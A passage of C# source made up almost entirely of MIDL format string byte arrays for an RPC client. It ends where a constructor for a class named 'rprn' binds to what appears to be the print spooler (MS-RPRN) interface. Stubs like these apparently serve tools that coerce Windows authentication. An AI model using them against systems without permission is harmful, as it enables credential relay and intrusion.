0x00,0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x26,0x00,
0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x27,0x00,0x08,
0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,
0x00,0x00,0x28,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,
0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x29,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x2a,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,
0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x2b,0x00,0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x40,0x00,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x2c,0x00,0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,
0x00,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x2d,0x00,0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,
0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x2e,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,
0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x2f,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,
0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x30,0x00,0x08,0x00,0x32,
0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,
0x31,0x00,0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x32,
0x00,0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x33,0x00,
0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,
0x00,0x00,0x00,0x34,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,
0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x35,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,
0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x36,0x00,0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x08,0x01,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x37,0x00,0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x08,0x01,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x38,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x39,0x00,0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,
0x00,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x3a,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,
0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x3b,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,
0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x3c,0x00,0x08,0x00,
0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,
0x00,0x3d,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x04,0x00,0x08,0x00,
0x00,0x48,0x00,0x00,0x00,0x00,0x3e,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x70,
0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x3f,0x00,0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x08,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x40,0x00,0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x08,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x41,0x00,0x1c,0x00,0x30,0x40,0x00,0x00,0x00,0x00,0x3c,0x00,0x08,0x00,0x46,0x07,0x08,0x05,0x00,0x00,
0x01,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x3a,0x00,0x48,0x00,0x04,0x00,0x08,0x00,0x48,0x00,0x08,0x00,0x08,0x00,0x0b,0x00,0x0c,0x00,0x02,0x00,0x48,
0x00,0x10,0x00,0x08,0x00,0x0b,0x00,0x14,0x00,0x3e,0x00,0x70,0x00,0x18,0x00,0x08,0x00,0x00
};
private static byte[] MIDL_ProcFormatStringx64 = new byte[] {
0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x01,0x00,0x30,0x00,0x31,0x08,0x00,0x00,0x00,0x5c,0x08,0x00,0x40,0x00,0x46,0x06,
0x0a,0x05,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x0b,0x00,0x00,0x00,0x02,0x00,0x10,0x01,0x08,0x00,0x0a,0x00,0x0b,0x00,0x10,0x00,0x02,0x00,0x0b,
0x01,0x18,0x00,0x1e,0x00,0x48,0x00,0x20,0x00,0x08,0x00,0x70,0x00,0x28,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x02,0x00,0x10,0x00,0x32,0x00,
0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,
0x00,0x03,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,
0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x04,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x05,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,
0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x06,0x00,0x10,0x00,0x32,0x00,0x00,
0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,
0x07,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,
0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x08,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x09,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,
0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0a,0x00,0x10,0x00,0x32,0x00,0x00,0x00,
0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0b,
0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,
0x00,0x48,0x00,0x00,0x00,0x00,0x0c,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0d,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0e,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,
0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0f,0x00,
0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,
0x48,0x00,0x00,0x00,0x00,0x10,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x11,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x12,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,
0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x13,0x00,0x10,
0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,
0x00,0x00,0x00,0x00,0x14,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,
0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x15,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x16,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,
0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x17,0x00,0x10,0x00,
0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,
0x00,0x00,0x00,0x18,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,
0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x19,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x1a,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,
0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x1b,0x00,0x10,0x00,0x32,
0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,
0x00,0x00,0x1c,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,
0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x1d,0x00,0x10,0x00,0x30,0xe0,0x00,0x00,0x00,0x00,0x38,0x00,0x40,0x00,0x44,0x02,0x0a,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x01,0x00,0x00,0x32,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x1e,0x00,0x10,0x00,0x32,
0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,
0x00,0x00,0x1f,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,
0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x20,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x21,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,
0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x22,0x00,0x10,0x00,0x32,0x00,
0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,
0x00,0x23,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,
0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x24,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x25,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,
0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x26,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,
0x00,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x27,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,
0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x28,0x00,0x10,0x00,0x32,
0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,
0x00,0x00,0x29,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,
0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x2a,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x2b,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,
0x00,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x2c,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x40,0x00,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x2d,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x40,0x00,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x2e,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,
0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x2f,0x00,0x10,
0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,
0x00,0x00,0x00,0x00,0x30,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,
0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x31,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x0a,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x32,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x0a,0x01,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x33,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x34,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,
0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x35,0x00,
0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,
0x48,0x00,0x00,0x00,0x00,0x36,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x48,0x00,0x00,0x00,0x00,0x37,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x38,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x39,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x0a,
0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x3a,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,
0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x3b,0x00,0x10,0x00,0x32,0x00,0x00,
0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,
0x3c,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,
0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x3d,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x3e,0x00,0x10,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x44,0x01,0x0a,
0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x3f,0x00,0x08,0x00,0x32,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x40,0x00,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x40,0x00,0x08,0x00,0x32,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x41,0x00,0x38,0x00,0x30,0x40,
0x00,0x00,0x00,0x00,0x3c,0x00,0x08,0x00,0x46,0x07,0x0a,0x05,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x36,0x00,0x48,0x00,0x08,
0x00,0x08,0x00,0x48,0x00,0x10,0x00,0x08,0x00,0x0b,0x00,0x18,0x00,0x02,0x00,0x48,0x00,0x20,0x00,0x08,0x00,0x0b,0x00,0x28,0x00,0x3a,0x00,0x70,0x00,
0x30,0x00,0x08,0x00,0x00
};
private static byte[] MIDL_TypeFormatStringx86 = new byte[] {
0x00,0x00,0x12,0x08,0x25,0x5c,0x11,0x04,0x02,0x00,0x30,0xa0,0x00,0x00,0x11,0x00,0x0e,0x00,0x1b,0x00,0x01,0x00,0x19,0x00,0x00,0x00,0x01,0x00,0x01,
0x5b,0x16,0x03,0x08,0x00,0x4b,0x5c,0x46,0x5c,0x04,0x00,0x04,0x00,0x12,0x00,0xe6,0xff,0x5b,0x08,0x08,0x5b,0x11,0x04,0x02,0x00,0x30,0xe1,0x00,0x00,
0x30,0x41,0x00,0x00,0x12,0x00,0x48,0x00,0x1b,0x01,0x02,0x00,0x19,0x00,0x0c,0x00,0x01,0x00,0x06,0x5b,0x16,0x03,0x14,0x00,0x4b,0x5c,0x46,0x5c,0x10,
0x00,0x10,0x00,0x12,0x00,0xe6,0xff,0x5b,0x06,0x06,0x08,0x08,0x08,0x08,0x5b,0x1b,0x03,0x14,0x00,0x19,0x00,0x08,0x00,0x01,0x00,0x4b,0x5c,0x48,0x49,
0x14,0x00,0x00,0x00,0x01,0x00,0x10,0x00,0x10,0x00,0x12,0x00,0xc2,0xff,0x5b,0x4c,0x00,0xc9,0xff,0x5b,0x16,0x03,0x10,0x00,0x4b,0x5c,0x46,0x5c,0x0c,
0x00,0x0c,0x00,0x12,0x00,0xd0,0xff,0x5b,0x08,0x08,0x08,0x08,0x5b,0x00
};
private static byte[] MIDL_TypeFormatStringx64 = new byte[] {
0x00,0x00,0x12,0x08,0x25,0x5c,0x11,0x04,0x02,0x00,0x30,0xa0,0x00,0x00,0x11,0x00,0x0e,0x00,0x1b,0x00,0x01,0x00,0x19,0x00,0x00,0x00,0x01,0x00,0x01,
0x5b,0x1a,0x03,0x10,0x00,0x00,0x00,0x06,0x00,0x08,0x40,0x36,0x5b,0x12,0x00,0xe6,0xff,0x11,0x04,0x02,0x00,0x30,0xe1,0x00,0x00,0x30,0x41,0x00,0x00,
0x12,0x00,0x38,0x00,0x1b,0x01,0x02,0x00,0x19,0x00,0x0c,0x00,0x01,0x00,0x06,0x5b,0x1a,0x03,0x18,0x00,0x00,0x00,0x0a,0x00,0x06,0x06,0x08,0x08,0x08,
0x36,0x5c,0x5b,0x12,0x00,0xe2,0xff,0x21,0x03,0x00,0x00,0x19,0x00,0x08,0x00,0x01,0x00,0xff,0xff,0xff,0xff,0x00,0x00,0x4c,0x00,0xda,0xff,0x5c,0x5b,
0x1a,0x03,0x18,0x00,0x00,0x00,0x08,0x00,0x08,0x08,0x08,0x40,0x36,0x5b,0x12,0x00,0xda,0xff,0x00
};
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
public rprn()
{
Guid interfaceId = new Guid("12345678-1234-ABCD-EF00-0123456789AB");
